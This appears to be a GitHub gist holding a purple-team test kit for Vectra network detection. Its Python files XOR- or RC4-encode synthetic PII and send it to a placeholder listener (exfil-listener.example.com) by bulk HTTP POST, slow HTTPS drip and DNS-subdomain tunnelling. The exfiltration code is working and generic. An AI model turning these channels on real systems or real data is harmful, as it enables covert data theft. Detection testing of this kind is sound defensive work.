Created
March 9, 2026 15:42
-
-
Save derekxmartin/b6d58611b3b0cc54724a8bfc19bfb321 to your computer and use it in GitHub Desktop.
xor/rc4
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| encoders.py | |
| XOR (single-byte, rolling) and RC4 encoding implementations. | |
| These are intentionally simple — mirrors real-world malware tradecraft. | |
| """ | |
| def xor_single_byte(data: bytes, key: int = 0x41) -> bytes: | |
| """Single-byte XOR. Trivial but still common in commodity malware.""" | |
| return bytes(b ^ key for b in data) | |
| def xor_rolling(data: bytes, key: bytes = b"purpleteam") -> bytes: | |
| """Rolling/multi-byte XOR. Used by Cobalt Strike, many RATs.""" | |
| key_len = len(key) | |
| return bytes(b ^ key[i % key_len] for i, b in enumerate(data)) | |
| def rc4_encrypt(data: bytes, key: bytes = b"vectra-test-key-2026") -> bytes: | |
| """ | |
| RC4 stream cipher (KSA + PRGA). | |
| Still used by: Cobalt Strike (malleable C2), TrickBot, QakBot, | |
| many implant families for C2 channel encryption. | |
| """ | |
| # Key Scheduling Algorithm (KSA) | |
| S = list(range(256)) | |
| j = 0 | |
| for i in range(256): | |
| j = (j + S[i] + key[i % len(key)]) % 256 | |
| S[i], S[j] = S[j], S[i] | |
| # Pseudo-Random Generation Algorithm (PRGA) | |
| i = j = 0 | |
| output = bytearray() | |
| for byte in data: | |
| i = (i + 1) % 256 | |
| j = (j + S[i]) % 256 | |
| S[i], S[j] = S[j], S[i] | |
| k = S[(S[i] + S[j]) % 256] | |
| output.append(byte ^ k) | |
| return bytes(output) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| exfil_channels.py | |
| Multiple exfil methods to test different Vectra detection models. | |
| All channels log what they send for post-test validation. | |
| """ | |
| import requests | |
| import time | |
| import base64 | |
| import logging | |
| logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s") | |
| log = logging.getLogger("exfil") | |
| def exfil_http_post(data: bytes, url: str, chunk_size: int = 1024 * 512) -> None: | |
| """ | |
| Bulk HTTP POST — should trigger Data Smuggler on large volumes. | |
| Sends in chunks to simulate realistic transfer patterns. | |
| """ | |
| total = len(data) | |
| sent = 0 | |
| for i in range(0, total, chunk_size): | |
| chunk = data[i:i + chunk_size] | |
| resp = requests.post( | |
| url, | |
| data=chunk, | |
| headers={"Content-Type": "application/octet-stream"}, | |
| timeout=30, | |
| ) | |
| sent += len(chunk) | |
| log.info(f"POST chunk {i // chunk_size + 1} | {sent}/{total} bytes | HTTP {resp.status_code}") | |
| log.info(f"[+] Exfil complete: {sent} bytes via HTTP POST") | |
| def exfil_https_drip(data: bytes, url: str, chunk_size: int = 4096, delay: float = 5.0) -> None: | |
| """ | |
| Low-and-slow HTTPS exfil — small chunks over extended period. | |
| Targets Hidden HTTPS Tunnel detection (long session, unusual cadence). | |
| """ | |
| total = len(data) | |
| sent = 0 | |
| for i in range(0, total, chunk_size): | |
| chunk = data[i:i + chunk_size] | |
| resp = requests.post( | |
| url, | |
| data=chunk, | |
| headers={"Content-Type": "application/octet-stream"}, | |
| timeout=30, | |
| verify=True, # Use TLS — we want Vectra to see encrypted traffic | |
| ) | |
| sent += len(chunk) | |
| log.info(f"DRIP chunk {i // chunk_size + 1} | {sent}/{total} bytes | sleeping {delay}s") | |
| time.sleep(delay) | |
| log.info(f"[+] Drip exfil complete: {sent} bytes over ~{(total / chunk_size) * delay:.0f}s") | |
| def exfil_dns_txt(data: bytes, domain: str, chunk_size: int = 200) -> None: | |
| """ | |
| DNS-based exfil — base64 encodes chunks as subdomain labels. | |
| Requires a DNS listener on the authoritative NS for the test domain. | |
| Target: DNS Tunnel detection model. | |
| NOTE: This is a stub — full implementation needs dnspython or | |
| raw socket queries. Included for completeness of the test matrix. | |
| """ | |
| import dns.resolver # pip install dnspython | |
| total = len(data) | |
| sent = 0 | |
| for i in range(0, total, chunk_size): | |
| chunk = data[i:i + chunk_size] | |
| encoded = base64.b32encode(chunk).decode().rstrip("=").lower() | |
| # Split into DNS-safe labels (max 63 chars each) | |
| labels = [encoded[j:j + 63] for j in range(0, len(encoded), 63)] | |
| subdomain = ".".join(labels) | |
| query = f"{subdomain}.{domain}" | |
| try: | |
| dns.resolver.resolve(query, "TXT") | |
| except Exception: | |
| pass # Expected — we don't need a real answer | |
| sent += len(chunk) | |
| log.info(f"DNS chunk {i // chunk_size + 1} | {sent}/{total} bytes") | |
| log.info(f"[+] DNS exfil complete: {sent} bytes") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| generate_dummy_data.py | |
| Produces synthetic PII dataset for exfil testing. | |
| Never use real data. | |
| """ | |
| import json | |
| import os | |
| from faker import Faker | |
| fake = Faker() | |
| def generate_dataset(num_records: int = 10_000, output_path: str = "dummy_pii.json") -> str: | |
| records = [] | |
| for _ in range(num_records): | |
| records.append({ | |
| "name": fake.name(), | |
| "ssn": fake.ssn(), | |
| "email": fake.email(), | |
| "address": fake.address(), | |
| "phone": fake.phone_number(), | |
| "cc_number": fake.credit_card_number(), | |
| "dob": fake.date_of_birth(minimum_age=18, maximum_age=90).isoformat(), | |
| }) | |
| with open(output_path, "w") as f: | |
| json.dump(records, f) | |
| size_mb = os.path.getsize(output_path) / (1024 * 1024) | |
| print(f"[+] Generated {num_records} records ({size_mb:.2f} MB) -> {output_path}") | |
| return output_path | |
| if __name__ == "__main__": | |
| generate_dataset() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| listener.py | |
| Minimal Flask catch server. Deploy on the controlled external endpoint. | |
| Logs everything received for post-test comparison. | |
| Usage: | |
| pip install flask | |
| python listener.py --port 443 --tls --cert cert.pem --key key.pem | |
| """ | |
| from flask import Flask, request | |
| import argparse | |
| import os | |
| import time | |
| import hashlib | |
| app = Flask(__name__) | |
| LOG_DIR = "received" | |
| @app.route("/upload", methods=["POST"]) | |
| def receive(): | |
| data = request.get_data() | |
| ts = time.strftime("%Y%m%d_%H%M%S") | |
| sha256 = hashlib.sha256(data).hexdigest()[:16] | |
| filename = f"{LOG_DIR}/{ts}_{sha256}.bin" | |
| os.makedirs(LOG_DIR, exist_ok=True) | |
| with open(filename, "wb") as f: | |
| f.write(data) | |
| print(f"[+] Received {len(data)} bytes -> {filename}") | |
| return "OK", 200 | |
| if __name__ == "__main__": | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument("--port", type=int, default=8443) | |
| parser.add_argument("--tls", action="store_true") | |
| parser.add_argument("--cert", default="cert.pem") | |
| parser.add_argument("--key", default="key.pem") | |
| args = parser.parse_args() | |
| ssl_ctx = None | |
| if args.tls: | |
| ssl_ctx = (args.cert, args.key) | |
| app.run(host="0.0.0.0", port=args.port, ssl_context=ssl_ctx) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| run_test.py | |
| Orchestrates the full test matrix. Run from the test host. | |
| Usage: | |
| python run_test.py --target https://exfil-listener.example.com/upload \ | |
| --dns-domain exfil.test.example.com \ | |
| --data-file dummy_pii.json \ | |
| --test all | |
| """ | |
| import argparse | |
| import json | |
| import sys | |
| import time | |
| from pathlib import Path | |
| from encoders import xor_single_byte, xor_rolling, rc4_encrypt | |
| from exfil_channels import exfil_http_post, exfil_https_drip, exfil_dns_txt | |
| from generate_dummy_data import generate_dataset | |
| TESTS = { | |
| "xor_single_http": { | |
| "description": "Single-byte XOR over HTTP POST (bulk)", | |
| "encoder": lambda d: xor_single_byte(d, key=0x41), | |
| "channel": "http_post", | |
| "mitre": "T1027 + T1048.003", | |
| }, | |
| "xor_rolling_https": { | |
| "description": "Rolling XOR over HTTPS POST (bulk)", | |
| "encoder": lambda d: xor_rolling(d, key=b"purpleteam"), | |
| "channel": "https_post", | |
| "mitre": "T1027 + T1573.001", | |
| }, | |
| "rc4_https": { | |
| "description": "RC4 over HTTPS POST (bulk)", | |
| "encoder": lambda d: rc4_encrypt(d, key=b"vectra-test-key-2026"), | |
| "channel": "https_post", | |
| "mitre": "T1027 + T1573.001", | |
| }, | |
| "rc4_https_drip": { | |
| "description": "RC4 over HTTPS (low-and-slow drip)", | |
| "encoder": lambda d: rc4_encrypt(d, key=b"vectra-test-key-2026"), | |
| "channel": "https_drip", | |
| "mitre": "T1027 + T1573.001", | |
| }, | |
| "xor_dns": { | |
| "description": "XOR over DNS TXT record queries", | |
| "encoder": lambda d: xor_single_byte(d, key=0x41), | |
| "channel": "dns", | |
| "mitre": "T1027 + T1048.001", | |
| }, | |
| } | |
| def load_data(path: str) -> bytes: | |
| return Path(path).read_bytes() | |
| def run_test(test_name: str, data: bytes, target: str, dns_domain: str) -> dict: | |
| test = TESTS[test_name] | |
| print(f"\n{'='*60}") | |
| print(f"TEST: {test_name}") | |
| print(f"DESC: {test['description']}") | |
| print(f"ATT&CK: {test['mitre']}") | |
| print(f"{'='*60}") | |
| # Encode | |
| start = time.time() | |
| encoded = test["encoder"](data) | |
| encode_time = time.time() - start | |
| print(f"[+] Encoded {len(data)} -> {len(encoded)} bytes in {encode_time:.2f}s") | |
| # Exfiltrate | |
| exfil_start = time.time() | |
| if test["channel"] == "http_post": | |
| exfil_http_post(encoded, target.replace("https://", "http://")) | |
| elif test["channel"] == "https_post": | |
| exfil_http_post(encoded, target) | |
| elif test["channel"] == "https_drip": | |
| exfil_https_drip(encoded, target, chunk_size=4096, delay=5.0) | |
| elif test["channel"] == "dns": | |
| exfil_dns_txt(encoded, dns_domain) | |
| exfil_time = time.time() - exfil_start | |
| result = { | |
| "test": test_name, | |
| "description": test["description"], | |
| "mitre": test["mitre"], | |
| "data_size_bytes": len(data), | |
| "encoded_size_bytes": len(encoded), | |
| "encode_time_s": round(encode_time, 2), | |
| "exfil_time_s": round(exfil_time, 2), | |
| "timestamp": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()), | |
| } | |
| print(f"[+] Complete in {exfil_time:.2f}s") | |
| return result | |
| def main(): | |
| parser = argparse.ArgumentParser(description="RC4/XOR Exfil Test Runner") | |
| parser.add_argument("--target", required=True, help="Exfil listener URL") | |
| parser.add_argument("--dns-domain", default="exfil.test.example.com", help="DNS exfil domain") | |
| parser.add_argument("--data-file", default="dummy_pii.json", help="Path to test data") | |
| parser.add_argument("--test", default="all", help="Test name or 'all'") | |
| parser.add_argument("--generate", action="store_true", help="Generate dummy data first") | |
| parser.add_argument("--records", type=int, default=10_000, help="Records to generate") | |
| args = parser.parse_args() | |
| if args.generate: | |
| generate_dataset(num_records=args.records, output_path=args.data_file) | |
| data = load_data(args.data_file) | |
| print(f"[*] Loaded {len(data)} bytes from {args.data_file}") | |
| tests_to_run = list(TESTS.keys()) if args.test == "all" else [args.test] | |
| results = [] | |
| for test_name in tests_to_run: | |
| if test_name not in TESTS: | |
| print(f"[-] Unknown test: {test_name}", file=sys.stderr) | |
| continue | |
| result = run_test(test_name, data, args.target, args.dns_domain) | |
| results.append(result) | |
| print(f"[*] Pausing 60s between tests for Vectra to process...\n") | |
| time.sleep(60) | |
| # Write results log | |
| results_file = f"test_results_{time.strftime('%Y%m%d_%H%M%S')}.json" | |
| with open(results_file, "w") as f: | |
| json.dump(results, f, indent=2) | |
| print(f"\n[+] Results written to {results_file}") | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment